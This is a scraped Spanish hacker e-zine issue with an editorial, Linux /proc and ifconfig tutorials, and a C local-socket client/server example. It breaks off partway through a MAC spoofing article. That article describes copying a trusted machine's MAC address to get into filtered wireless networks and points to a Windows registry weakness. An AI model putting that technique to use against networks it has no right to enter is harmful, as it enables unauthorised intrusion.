0% encontró este documento útil (0 votos)
429 vistas89 páginas

CDT3 PDF

Cargado por

Gust Ral Tool
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
429 vistas89 páginas

CDT3 PDF

Cargado por

Gust Ral Tool
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd

Numero 3

Mircoles 31 de Marzo del 2004


Distribucin libre y gratuita

Mail: [email protected]
Cultura Digital Team

Copyleft 2002- 2005

Por una Cultura Digital


Saludos
Vulnfact Security Labs
http://www.vulnfact.com

El Hacker
http://www.elhacker.net

Zine Store
http://www.zine- store.com.ar

Hackemate
http://www.hackemate.com.ar

Raza Mexicana
http://www.raza- mexicana.org

Hackers Venezuela
http://www.hven.com.ve

Infohackers
http://www.infohacker.org

Foro.powers
http://foro.powers.cl

Team Informatica IRC.CL


http://www.ifm.cl

Hackindex
http://www.hackindex.org

Electron Security Team


http://www.est.cl

Proyecto R
http://www.cdlr.org

United Hackers International


http://www.uhi.cl

Saludos tambin a vision, hkm, hd, al staff de G-Con y un especial saludo a lo que fue mentes
Inquietas.

Download s/Mirrors
http://www.zine- store.com.ar
http://www.elhacker.net
http://www.hackemate.com.ar
http://www.uhi.cl
http://www.hven.com.ve
Colaborador e s De Esta Edicin
kaskade
Mail de contacto: [email protected]

Kaskade perteneciente a Infohackers, se le agradece a esta institucin el apoyo que nos ha brindado en
este ultimo tiempo, asi tambin un saludo cordial a su presidente garablaster y de aqu en mas,
empieza una colaboracin mutua entre infohackers y CDT.

Ruc
Mail de contacto: [email protected]

Ruc hermano argentino con buenos conocimientos en seguridad informtica.

A nuestros colaboradores, en este numero de nuestra e-zine muchas gracias, as tambin a las
instituciones con las cuales en este tiempo se han formado vnculos de cooperacin mutua, como lo son:

- Infohackers
- Vulnfact

Tambin a diferentes personas y entidades que hacen que Cultura Digital Team siga con las ganas de
seguir trabajando, vivo y coleando por mucho tiempo mas.

Desde ac saludos cordiales y a seguir adelante en este camino...


ndice CDT3

Titulo Autor Pagina

Introduccin Editor CDT 6


Editorial Editor CDT 7
Linux parte 4 _ AlphaIce _ 8
Programacion en C parte 4 (socket) _ AlphaIce _ 11
Mac Spoofing en Win/Linux/Bsd CMxS & [EL_CoNaN] 16
Seguridad en entornos home LeOn177 24
Una mirada al G-Con Mxico darko 33
Revolucin Artificial LeOn177 40
SQL Injection 24v Kaskade 43
Relajando la neura bitburner 49
Tinc VPN How-to ruc 53
El lado oscuro de la seguridad LeOn177 & [EL_CoNaN] 62
El amigo Webdav Remote Misconfig Rowter 71
Paseando por los proyectos CDT Editor CDT 79
La columna del lector CDT Staff 82
Noticias del mundo under Chile y el mundo LeOn177 86
Despedida Editor CDT 89

Cultura Digital Team


Disclaim er Cultura Digital Team
Cultura Digital Team no se hace responsable por el mal uso que le puedas llegar a dar a
los textos expuestos en esta revista electrnica, ya que algunos de los textos si son llevados
a la practica, podran prestarse a fines ilegales, pero que te quede bien claro que incitar a la
ilegalidad no es el fin que nos mueve, as que cae en tu mera responsabilidad lo que hagas
con esta magazine.

Hace ya un tiempo, naci un grupo de underground chileno que ha avanzado por sobre
las barreras geogrficas y se ha expandido por Amrica, no es solo un grupo solamente
chileno, ahora un mexicano, un guatemalteco, y un argentino nos acompaan en la tarea
de expandir ideas y pensamientos, limpiar imgenes de ilegalidad que manchan la palabra
hacker. No nos gusta usar esa palabra para si mismos pero al igual que ellos, somos
mentes inquietas que buscamos el saber en los sistemas informticos, vivimos sin
delimitaciones fronterizas ni de ideologas, ni de rasgos humanos. Quedamos tranquilos
con la idea de que no hacemos mal con lo que hacemos, y si todo esto produce molestia
alguna posible, all ustedes, seguiremos trabajando con nuestras mentes limpias y
dispuestas a seguir aprendiendo.
Introduc ci n
Por: Editor CDT
Mail de contact o: [email protected]

Seores, seoritas, estimadosmadisimos lectores, amigos varios y otros no tanto xD, bienvenidos
nuevamente a esta nueva edicin? de la revista electrnica de CDT, en su cuarta edicin y con mas
experiencia en todos los sentidos. Paso en el momento a dar un resumen de estos tres meses dentro del
team y lo que ha sido la evolucin de la Zine y el team.

Verano... fin del ao prcticamente, donde se destina tiempo a tirarse las bolxx xD, que ac no ha sido
as, amigos del team entran a la universidad, algunos la siguen y aproblemados por la PSU o alguna
otra cosa, deben dedicarle tiempo, adems de que otros siguen con su trabajo y tareas normales. Todo
esto se traduce en reduccin de tiempo a CDT, y agregando cansancio de algunos, por el ao que pas y
todo lo que CDT y la vida personal signific, da un total de un poco de prdida de ganas.

El poco tiempo lo pueden ver fcilmente, la fecha de esta zine estaba prevista para ao nuevo pero se
dio en un par de meses despus.

El cansancio no se nota, vamos a seguir de cualquier forma, y adems se quita con personas que nos
apoyan y nos devuelven las ganas por trabajar, no las voy a nombrar porque parecera fotito feliz, pero
as es la cosa vamos a seguir como de lugar.

La introduccin de la zine la hago con cierta felicidad, veo que prendimos una llama, sea del tamao
que crean, pero se nota que se encendi algo. En irc.cl ya otros han desarrollado ideas de charlas, sean
de las basadas en las nuestras o en otras; se ha a expandido a mas lugares esta magazine, con eso ya
mas personas estn creyendo que el under chileno puede ser bueno o salir de esa quietud; finalmente
ms inters se ha demostrado por todo lo anteriormente dicho, mas oferta es mas demanda, nueva
gente interesada por contenidos que otros les han brindado, y es as como todo podra ir a un buen
paso. No nos interesan el reconocimiento que nos puedan dar. Ese no es nuestro norte.

Ahora pasen a disfrutar de la E-Zine formada por colaboraciones de mas personas que se nos estn
uniendo, mejor material, nueva portada, mas gente en el team... que mas les digo, estoy feliz :D porque
esto que pocos crean que iba a durar, lo hemos llevado bien pienso yo... hasta el momento; pasen,
tomen asiento, recline la silla y enjoy! CDT3 empieza.
Editorial
Por: Editor CDT
Mail de contact o: [email protected]

Hackers criminales ?

Un a gran pregunta, no lo creen as?, bueno esta editorial va enfocada a esta pregunta y que ac se le
trata de dar una respectiva respuesta.

Esto lo empezare a relatar y intentare de dar una respuesta lgica.

Todos hoy por hoy al toparse con la palabra hacker, la asocian de inmediato en sus mentes al sinnimo
de ladrn ciberntico, a un personaje peligroso en internet, yo me pregunto cuantos de ustedes saben
verdaderamente lo que es y significa ser hacker?, a que se debe ese estigma? y porque fue clavado en
la mente de las personas asociar el sinnimo de criminal a la palabra hacker??, por los medios de
comunicacin?? los periodistas mal informados que no saben distinguir entre los diferentes personajes
que existen en este mundillo?, porque a todos se les mete en el mismo saco y solo ven a una persona?,
que es cazada por las diferentes policas del mundo haciendo cosas malas, transacciones bancarias a
diferentes bancos con dinero de otros, clonando tarjetas de crdito, etc., y esto lo sacan a relucir en los
medios de comunicacin como "hacker atrapado y capturado al traspasar a su cuenta bancaria 1000
dolares" , " hacker creador del viruz blaster atrapado". Pero estos personajes son hackers???, tu eres
un hacker por violar la seguridad de un servidor?, tu eres un hacker si eres capas de clonar tarjetas de
crdito???, tu eres un hacker si eres capas de engaar a alguien y obtener beneficios??.

Por favor seores de que estamos hablando, tu no eres un hacker por violar un sistema de seguridad
informtico, telemtico u otro, tu no eres un hacker si tienes las herramientas y sabes como clonar
tarjetas de crdito, tu no eres un hacker si buscas ser reconocido por tus hechos de alzamiento de voz,
como defaceando servidores, ofendiendo a los dems con fines de ego, monetario o de otra ndole.

Cuantos verdaderamente saben que los hackers son los que hacen que internet se siga desarrollando?,
cuantos de ustedes ven softwares de seguridad, protocolos de comunicacin, sistemas operativos,
lenguajes de programacin, etc., creados por verdaderos hackers??, si esto es as, ningn hacker se
nombrar a a si mismo uno, ni tampoco buscara que los demas lo hagan o lo creen ser. Siempre un
hacker velara por del desarrollo de las tecnologas, porque un hacker va de la mano con ellas y el
termino no solamente se extiende a redes de informacin si no que tambin a la vida diaria de cada
uno.

Nadie habla por hablar ni por aparenta r, eso nunca va a salvar a una persona, ac cada uno sabe
donde vive que es lo que hace y lo que quiere llegar hacer, que quede bien claro que ac todos no somos
hackers, ni tampoco aspiramos a que la gente los sienta como dichos, Pero si aspiramos a contribuir a
este mundo, al mundo de la informacin, como lo decidimos hacer y as seguiremos pisando fuerte por
un camino el cual hay que recorrer.

Esto fue un intento de una respuesta lgica al estigma de los hackers que tiene el comn de la gente.
Con esto que quede bien claro que nosotros compartimos este pensamiento, pero que no andamos por
ah presumiendo serlo, como una variedad de gente, que solo fanfarronea y critica el trabajo de otros.
Linux Parte 4
Por: _Alphaic e_
Mail de contact o: [email protected]

Hola a todos... bueno comienza un nuevo ao y tambin una renovacin de esta seccin, que la dividir
en mini secciones para hacer mas ordenado esto (ya era hora no.... xD) la razn es que se pierde
contenido de temas, ahora mostrare mas temas para dejarlos satisfechos :D.

Secciones de esta edicin:

A Fondo
En la Linea de Comandos

A Fond o:

Siste m a de Fich er os /proc

En la edicin anterior ya hablamos visto los sistemas de ficheros, la idea no es aburrirlos con lo mismo
de antes... no, por el contrario, si bien recuerdan dimos una pincelada sobre los sistemas de ficheros y
sin embargo /proc es uno de los mas importantes de este sistema operativo ya que nos entrega datos
importantes de este en tiempo real.

Este sistema de ficheros virtual tiene una caracterstica especial, si, dije virtual, pues si... es virtual
porque sus datos no se sostienen en el disco duro sino que este interacta directamente con el kernel y
la info que ven, va cambiando cada segundo.

Veamos el rbol general de /proc

alphaice@DarkStaR:~$ ls /proc/
1/ 2230/ 384/ 461/ 488/ 566/ 7/ driver/ modules
10/ 2231/ 385/ 465/ 492/ 573/ 701/ execdomains mounts@
1052/ 2232/ 386/ 467/ 497/ 575/ 705/ fb mtrr
1060/ 2245/ 387/ 468/ 5/ 576/ 713/ filesystems net/
1061/ 2246/ 388/ 469/ 512/ 577/ 72/ fs/ partitions
1062/ 2259/ 389/ 470/ 516/ 578/ 780/ ide/ pci
1064/ 24/ 390/ 471/ 518/ 579/ 9/ interrupts scsi/
11/ 3/ 391/ 472/ 520/ 580/ acpi/ iomem self@
1102/ 336/ 4/ 474/ 521/ 581/ asound/ ioports slabinfo
1105/ 339/ 402/ 475/ 522/ 6/ buddyinfo irq/ stat
1106/ 342/ 425/ 476/ 523/ 603/ bus/ kallsyms swaps
1107/ 345/ 427/ 478/ 524/ 665/ cmdline kcore sys/
1108/ 356/ 434/ 480/ 526/ 669/ cpia/ kmsg sysvipc/
1113/ 358/ 436/ 482/ 538/ 670/ cpuinfo loadavg tty/
12/ 362/ 438/ 484/ 539/ 671/ devices locks uptime
1649/ 368/ 440/ 486/ 540/ 672/ diskstats meminfo version
2/ 383/ 449/ 487/ 541/ 692/ dma misc vmstat

Se preguntar a n, donde lo puedo usar??? o para que me sirve esto???, fcil, si ustedes quieren ver que
procesos corren en nuestro sistema hacemos un ps aux, cierto... bien pues el comando ps o el famoso
programa para ver el estado de nuestro sistema gkrellm lo usan para obtener esos datos, ahora como
podemos visualizarlos de manera practica... fcil mediante un simple cat, o con un visor de textos
cualquiera como el gedit u otros.
Bueno si hablamos de comandos no nos olvidemos del more y los otros, tambin sirven :D, as por
ejemplo, hacemos un cat al archivo virtual interr upts, podemos ver la lista de interrupciones en uso de
nuestro sistema, como de la misma manera podemos ver con un cat /proc/pci la lista de los dispositivos
pci en nuestra maquina, bueno entre los otros archivos que nos interesan estn: cpuinfo, que es para la
info del procesador; dma para los canales DMA; ioports para los puertos de entrada y salida, y
meminfo para obtener la informacin de la memoria tanto fsica como swap.

Tambin podemos ver la configuracin del hardware, como por ejemplo la info de nuestro sistema de
ficheros o los mdulos cargados (filesystems y modules), tambin podemos ver la particiones montadas
(mounts), con todo esto podemos hacernos la idea de ver la informacin casi esttica sobre la
configuracin del sistema.

Bueno si se fijaron en el ls de arriba pudimos ver algunos directorios en /proc, si se fijan son la mayora
nmeros, esos son los todos los procesos que se ejecutan en nuestro sistema, si recuerdan, los procesos
se identifican por su pid (identificador de procesos) el cual es un numero nico. Algunos de los archivos
que podemos encontrar dentro del fichero de proceso son los siguientes:

cmdline Retrata el nombre del proceso y sus opciones.


cwd Es un enlace simblico al directorio de trabajo del proceso.
environ Lista de variables de entorno.
exe Enlace simblico al binario que se ejecuta.
fd Un directorio con la lista de los ficheros en uso.
maps Mapas de memoria para los ejecutables y las libreras en uso.
mem Memoria usada por el proceso.
root Enlace simblico al directorio raiz donde se ejecuta el proc.
stat Estado del proceso.
statm Estado de la memoria del proceso.
status Estado del proceso en formato comprensible para un ser humano.

Cuando hacemos un ps o top lo que hace estos comandos es tomar la info que yace en /proc y la pone
frente a tu pantalla de manera legible, pero como ya vimos, podemos ver mas de lo que nos muestra ps
con un simple cat.

Existen otros directorios dentro de /proc que nos servirn para tareas varias como lo son el directorio
net/ donde podemos ver el estado de la red, entre otras cosillas que podemos hacer por ah.

Otra de las gracias que tiene /proc es el directorio sys/, bueno su existencia depender nica y
exclusivamente de que la compilacin de nuestro kernel hayamos dado la opcin de soporte de sysctl,
ya que con esto podremos modificar diversos parmetros acerca del funcionamiento de nuestro kernel
sin necesidad de recompilar o rebootear la maquina.

Un ejemplo de esto es para controlar si el kernel esta haciendo forwarding de las transmisiones de
datos por red, para esto hacemos un simple cat al fichero /proc/sys/net/ipv4/ip_forward y si su
contendido es 1, es que esta activado y si es 0 no lo esta. Si queremos modificar esto o sea si el
forwarding esta en 0 y queremos activar esta opcin hacemos un echo como root y listo... lo hacemos de
la siguiente manera.

# echo 1 > /proc/sys/net/ipv4/ip_forward

Ahora si hacen otra vez cat al mismo fichero y archivo vern que el contenido de este cambio a 1, eso
significa que esta activo.

Bueno en el directorio /proc/sys podemos encontrar gran extensin de archivos que tiene que ver con el
sistema, con los cuales podemos modificar el funcionamiento de nuestra maquina, vale decir que esto es
peligroso de cambiar cuando se es muy novato o si no se sabe que es lo que se cambia, por eso
recomiendo que no toquen nada si no saben lo que hacen ok.

Bien chicos y chicas (si las hay jejeje) los dejo para que hagan varios cat en su linux (de seguro lo van a
hacer despus de leer esto jejeje) sepan que hice este articulo con la intencin de que ustedes aprendan
como funciona el sistema por dentro, una pequea miradita de lo que hace este pinginito :D.

En la Linea de Comand o s

Hoy veremos la utilidad ifconfig, la utilidad se llama "configuracin de interfaces" (InterFace


Configuration), y esta sirve no solo para ver la configuracin de las tarjetas de red, sino para
configurarlas tambin, ahora veremos la sintaxis de ifconfig en una interfaz Ipv4 seria la siguiente:

# ifconfig interface IP- address netmask (netmask) broadcast (broadcast)

donde lo que esta entre parntesis son las direcciones, veamos un ejemplo

# ifconfig eth0 192.168.1.1 netmask 255.255.255.0 broadcast 192.168.1.255

Aqu tenemos la configuracin bsica donde eth0 es la interfase, tambin podemos encontrar Io0, ahora
para ver la configuracin de red de nuestra maquina tenemos que hacer ifconfig -a y nos muestra todo
sobre la configuracin.

Bien ahora si tenemos varias interfaces de redes en nuestra maquina y alguna de ellas no esta
funcionando (abajo) podemos activarla (subirla) esto lo hacemos de la siguiente manera...

#ifconfig up eth0

Tambin si alguna nos da problema y queremos bajarla tenemos que hacerla de la siguiente manera...

#ifconfig down eth0

Bueno existe varias opciones pero eso lo dejaremos para otra edicin, les dar una indicacin, si no
estan como root y quieren correr ifconfig lo hacen as:

$ifconfig /sbin/ifconfig

Ya chicos les dejo con la inquietud de seguir investigando ok y arriba al software libre y linux :D
Cuidense y estudien, que la prxima estar muy buena.

_AlphaIce_ The DarkStaR of the Darkside. Por una Cultura Digital.


Programa c i o n en C parte 4 ( socket )
Por: _AlphaIce_
Mail de contat o: alphaic [email protected]

#inclu d e <stdio.h>
main()
{
printf ("Hola a todos \ n")
}

Como estn, bueno yo aqu con esta nueva versin del manual de c y ahora veremos programacin de
sockets, aunque, esto es mas avanzado no deja de ser elemental para todos ustedes, as que si no
entienden pueden pregunta r por mail ok.
Introdu c c i n a los Sockets en C:
Existen muchas aplicaciones que podemos hacer con sockets generalmente utilidades de redes, donde
todas las aplicaciones de red tienen un punto en comn, necesitan intercambiar informacin con otras
mquinas, bueno esa es la funcin de la programacin de sockets.
Para que tengamos clara la pelcula, las versiones de Berkeley de Unix fueron las que introdujeron este
concepto de sockets, donde se inclua una nueva forma de comunicacin, a travs, del mtodo que daba
la posibilidad de establecer la comunicacin entre una red de computadores. Un proceso en una
maquina puede usar sockets para comunicarse con procesos en otra maquina, aunque tambin existen
los sockets de manera local.
La estructur a de esto es la que usamos como cliente/servidor. El servidor sera un proceso en espera de
peticiones de otros procesos, clientes (remotos o no). Un ejemplo de esto es el servicio FTP, el cual esta
en funcionamiento (servidor) y espera conexiones entrantes (clientes), cuando esto ocurre el servidor
atiende las diversas peticiones de los mismos, como cuando se hace una peticin de subir un archivo.
Una de las gracias de eso es que se puede establecer comunicacin entre diversos tipos de mquinas
Unix/clonicos (Unix, Linux, FreeBSD, etc) como as tambin con mquinas windows, esto se debe a que
el sistema de sockets fue emulada para windows con la librera winsock, as es posible poder
comunicarlas con este sistema de sockets a pesar que difiere la forma de programa rlas en ambos casos.
Como concepto de socket no es mas que una forma de comunicacin que permite implementa r una
estructura cliente/servidor tanto en red como localmente (lo dije antes o no???) El mecanismo en que
se basa el socket permite la conexin de mltiples clientes en un mismo servidor, cada uno con una
peticin, para lo cual el servidor responde a todas, de acuerdo a la forma en que esta programado.
Un ejemplo de la vida diaria, seria en la fila de un supermercado en la cual varias personas (clientes)
deben acercarse con su peticin (las compras) a las cajas donde los atender un cajero (servidor).
Creacin de un Sock et:
Para crear un socket debemos seguir los siguientes siete pasos:
Primero se debe ejecutar una aplicacin servidora encargada de atender futuras peticiones, esta
aplicacin crea el socket.
La aplicacin servidora debe asignar un nombre al socket, esto en funcin del tipo de socket con el
que se trabaja, el nombre o tipo de nombre variara. Para los sockets locales se accede desde el
archivo creado en el disco, en cambio, para los socket de red vienen identificados por la pareja
puerto/punto de acceso, siendo este par importante en la red en que se encuentren cliente/servidor.
La forma de nombrar un socket es mediante la funcin "bind".
Ahora creado el socket solo nos queda esperar a clientes que se conecten al servidor, lo que se
consigue mediante la funcin listen, la cual crea la cola para almacenar y atender peticiones de
distintos clientes.
Aceptamos una peticin con la funcin accept, esta funcin crea un socket diferente al anterior que
se encarga en atender al cliente que realiza la peticion. El primero de los socket al cual le hablamos
dado un nombre permanece para atender nuevas peticiones cliente, se pueden crear aplicaciones
que atiendan varias peticiones simultaneas, pero en el programa- ejemplo solo nos concentraremos
en un socket sencillo de aprendizaje y repaso de estos siete pasos. Un servidor simple har que los
clientes esperen en la cola de listen hasta que se haya terminado de atender una peticin anterior.
Cuando aparece una nueva conexin y no existe espacio suficiente en la cola (listen), esta conexin
es descartada y simplemente no se atiende.
Ahora la aplicacin cliente, la cual es mas simple que un servidor, crea un socket, no se le asigna
nombre, mediante una llamada a la funcin "socket".
Creado el socket, se llama a la funcin "connect" para lograr la comunicacin con el servidor, usando
como direccion el socket con el nombre que se haba creado.
Ya creados los sockets, es posible trabajar con ellos de la misma manera que con los descriptores de
archivos: haciendo llamadas a read y write para recibir y enviar datos respectivamente.
Bueno aqu los dejo con la inquietud de los sockets, para que aprendan, estoy pensando si sigo con esto
ya que queda mucho por delante acerca de este tema, por ahora los dejo con los ejemplos, un cliente y
un servidor para que los compilen y los ejecuten, estos ejemplos son para compilarse y usarse en una
maquina linux/unix, por ahora no me voy a dedicar a programas para windows y estoy meditando si lo
har a futuro. Diviertanse y crucen los dedos para que haga una segunda parte de sockets xD
Sobre los Progra m a s adjunt os:
Vienen en coligo para que puedan leerlos analizarlos y modificarlos a gusto, estos son ejemplos de
sockets locales ya que por tiempo no he terminado una versin escrita por mi para redes.
La forma de compilarla es la misma de siempre, con gcc y usando la opcin -o para asignarle un
nombre diferente al del nombre del coligo, de la siguiente manera:
$ gcc server1.c -o server1
Para ejecutar los programas lo haremos de la siguiente manera:
1. Primero ejecutamos el server: $ ./server1 El cual entregara una cadena "servidor en espera de
conexiones"
2. Luego se ejecuta el cliente de esta forma $ ./cliente1 mensaje donde dice mensaje es la cadena que
deseamos enviar. Recuerden solo pueden enviar una cadena sin espacios. Si lo hacen les dara un
mensaje de error "Sintaxis: cliente1 <cadena para enviar>". Diviertanse :D !!!
Bueno ac vamos a dar a conocer un el cdigo de los programas y luego un screenshoot, el cual les dar
a conocer como es el funcionamiento de los mismos.
A continuacin veremos los cdigos.

cat servidor1.c
/* Sevid o r1.c */
#includ e <sys/typ e s.h>
#includ e <sys/soc ke t.h>
#includ e <stdio.h>
#includ e <sys/un.h>
#includ e <unist d.h>
#defin e MAX_LEN 80
int main()
{
/* Variable s nece s a r ia s para trabajar con los sock e t s */
int serv er_so c kf d, clie nt_so c kf d;
int serv er_le n, clie nt_le n;
struc t socka d dr_ u n serv er_a ddr e s s;
struc t socka d dr_ u n clie nt_a ddr e s s;
/* Borra m o s cualq ui e r sock e t ant erio r m e n t e cread o */
unlink("serv e r_so c k e t");
/* Crea m o s un socke t sin nombr e para el servidor */
serv er_so c kf d = sock e t ( P F_U NIX,SOCK_STREAM, 0);
/* Parm e t r o s y bla bla */
serv er_addr e s s. su n_fa m il y = AF_UNIX;
strcpy( s e r v e r_ a ddr e s s.s u n_ p a t h,"serv er_soc k e t");
serv er_le n=siz e o f ( se r v e r_ a ddr e s s );
/* Asig na c io n de nombr e del socke t crea d o */
bind(se r v e r_so c kf d,( st r u c t socka d dr*)&ser v e r_add r e s s, serve r_le n);
/* Se crea una cola para acept a r cone x i o n con los clie nt e s */
liste n( s e r v e r_s o c kf d, 5);
while(1){
char string[MAX_LEN];
char mess a g e [] = "Mensaje Recibid o";
printf("Servido r en esper a de cone x io n e s \ n");
/* acept a m o s la cone x i o n */
client_le n = sizeof( clie n t_ a d dr e s s);
client_so c kf d = acce pt ( s e r v e r_ so c kf d,(str u c t sockad dr*)&clie nt_ad dr e s s,& clie n t_le n);
/* leem o s lo recibid o de la cone x i o n por el sock */
read(cli e n t_s o c kf d, string, MAX_LEN);

/* ahora mostra m o s lo que recibio el sock e t */

printf("Recibid o: %s\n", string);


/* envia m o s nue v o s dato s al clie nt e a trav e z de la cone xio n */
write( cli e n t_so c kf d, messa g e, strle n( m e s s a g e ) +1);
/* cerra m o s la cone x io n con el client e al finaliz ar */
close( clie n t_ so c kf d);
}
}
Bueno ese es nuestro servidor, ahora pasemos a ver nuestro cliente.
cat cliente1.c
/*** _Client e_: clie nt e. c ***/
#includ e <sys/typ e s.h>
#includ e <sys/soc ke t.h>
#includ e <stdio.h>
#includ e <sys/un.h>
#includ e <unist d.h>
#defin e MAX_LEN 80
int main(int argc, char *argv[])
{
/* Variable s nece s a r ia s para socke t s */
int sockf d;
int len;
struc t socka d d r_u n addre s s;
int result;
char string[MAX_LEN]; /*otra variable*/
/* compro b a m o s los para m e t r o s en la line a de coman d o */
if (argc != 2){
printf("Sintaxi s: clie nt e 1 <cade n a para enviar> \ n");
exit(1);
}
/* crea m o s el sock e t clie nt e */
sockfd = sock e t (A F_U NIX, SOCK_STREAM, 0);
/* estable c e m o s los para m e t r o s para la cone xi o n */
addre s s.s u n_fa m ily = AF_UNIX;
strcpy( a d dr e s s. s u n_ p a t h,"serv e r_so c k e t");
len = sizeof(a d dr e s s);
/* cone c t a m o s el socke t del clie nt e con el del servid or */
result = conn e c t ( s o c kf d, (struc t socka d dr *)&addre s s, len);

if(result == -1) {
perror("opps: clie nt e 1");
exit(2);
}
/* prepar a m o s los dato s que vam o s a enviar */
strcpy ( st ri ng,a r g v [1]);
/* envia m o s los dato s al servido r */
writ e(so c kf d, string, strle n( str in g )+1);
/* leem o s la respu e s t a del serv e r */
read( so c kf d, string, MAX_LEN);
/* lo mostr a m o s en pantalla */
printf("Del servido r: %s\n",string);
/* cerra m o s el sock e t */
close( so c kf d);
exit(0);
}
Y este seria nuestro cliente, a continuacin, los dejo con un screenshoot del socket funcionando, para
que se formen una visin de l.

Un lindo screenshoot para que lo vean de manera grfica. Bueno con eso culmino xD...
EOF.
_Alph@Ice_
The DarkStaR from the DarkSide, Por una Cultura Digital.
alphaice[at]hotmail[dot]com
Mac Spoofing en Win/Linux/BSD
Por: CMxS & [EL_CoNaN]
Mail de contact o CMxS: cmsalvad o@hotm ail.com
Mail de contact o [EL_CoNaN]: conanc dt@hotm ail.com

Prefaci o:
Hace un tiempo atrs dimos a conocer una noticia en la e-zine sobre el posible cambio de mac. Hoy al
pasar el tiempo, esto ya es una realidad, se han desarrollado diferentes softwares, herramientas,
tcnicas, etc. Nacidas de diferentes mentes inquietas que contribuyen constantemente al desarrollo de
Internet da a da.
Hoy ya es posible hacer cambios en nuestra MAC es por esto llevo ante todos ustedes este texto, para
que lo analicen y ac explicaremos a fondo la forma de hacerlo, nombraremos algunas herramientas y
daremos a conocer tambin algunas investigaciones realizadas y a su ves pasos a seguir para realizar
un cambio de MAC satisfactorio.
1.0.- Primero que nada dejando las cosas claras
2.0.- Entrando en materia mac spoofing en windows
2.1- Herramient as para windows
3.0.- Mac spoofing en linux
3.1.- Herramient as para linux
4.0.- Mac spoofing en BSD
5.0.- Palabras al cierre

1.0.- Primer o que nada, dejand o las cosas claras


Primero vamos a explicar algunas palabras, para los que no estn muy metidos en el tema.
NIC: Tarjeta de red ( Network Interface Card )
MAC Address: numero identificativo que es marcado en 48 bit y es a esto que se le denomina direccin
MAC, a su ves este identificativo es asignado por cada uno de los fabricantes de dispositivos de red y
principal mente viene marcado en la tarjeta ( hardware ) Esta direccin es exclusiva de cada
dispositivo. Los primeros 24 bit de cada identificativo identifican al fabricante de la tarjeta y esto esta
regulado en estnda res IEEE y es sabido que cada MAC es diferente.
Por otro lado muchas tarjetas permiten el cambio de los nmeros mac, con esto estamos diciendo que
no precisamente todas las marcas de tarjetas soportan que se realic un cambio satisfactorio de mac en
ellas, as que cuidado con eso.
y bueno llegamos al punto de como fue posible hacer que esto se hiciera realidad. Bsicamente esto fue
posible por el aprovechamiento de varios factores, como por ejemplo el conocido comando ifconfig en
linux que es dado para esto, tambin tenemos la posibilidad que reprograma ndo la tarjeta se puede
llegar hacer algo y tambin a la poca seguridad en la funcin NdisReadNetworkAddress en los
sistemas windows, esto sumado a los factores que ofrecen los fabricantes, dio la combinacin perfecta
para empezar a realizar cambios en las diferentes marcas de tarjetas de red.
Ahora tu te preguntara s y para que me sirve cambiar la direccin MAC de mi tarjeta de red??
A lo que te responder con algunos puntos tales como estos:

Para test de penetracin a redes y aseguramiento de las mismas


Uno quiere ocupar su viejo numero de MAC de su tarjeta daada xDD. El avance de las tecnologas,
a trado nuevas eras de redes, estas son las llamadas redes sin cable o wiriless y as tambin formas
de vulnerarlas y asegurarlas y el MAC Spoofing a cobrado mas adeptos despus de la aparicin de
estas redes, te has preguntado como entrar a una red con prioridad de acceso mediante nmeros o
segmentos de mac; pues facil sustituyendo un numero de mac de la red de confianza a tu PC y as
filtrarte en dicha red.
Etc, etc.
Y como puedo entonces cambiar mi numero de mac?, pues esto y mucho mas jejeje en nuestros
siguientes puntos a continuacin, no se lo pierda xDD.
Bueno seores es hora de entrar mas en profundidad as que vamos abarcando y pasando hacia el
siguiente punto.
2.0.- Entran d o en materia mac spoofi n g en wind o w s
Bsicamente esta tcnica se basa en el aprovechamiento de la funcin NdisReadNetworkAddress que
en sistemas windows, la nic ( tarjeta de red ) lee propiamente del registro de dicho sistema, sin el
debido encriptamiento es mas este registro se da a conocer en formato de texto plano y esto nos permite
su eminente metida de mano como se le dice comn mente en jerga chilena xDD...
Y bueno que podemos conseguir con esto?? la respuesta esta a la vista le podemos pasar un string falso
donde en dicho string especifiquemos la direccin de la mac que queremos obtener para nuestra tarjeta
de red.
Bueno en esta primera incursin los basaremos en el distro versin 95/98 de windows para luego dar
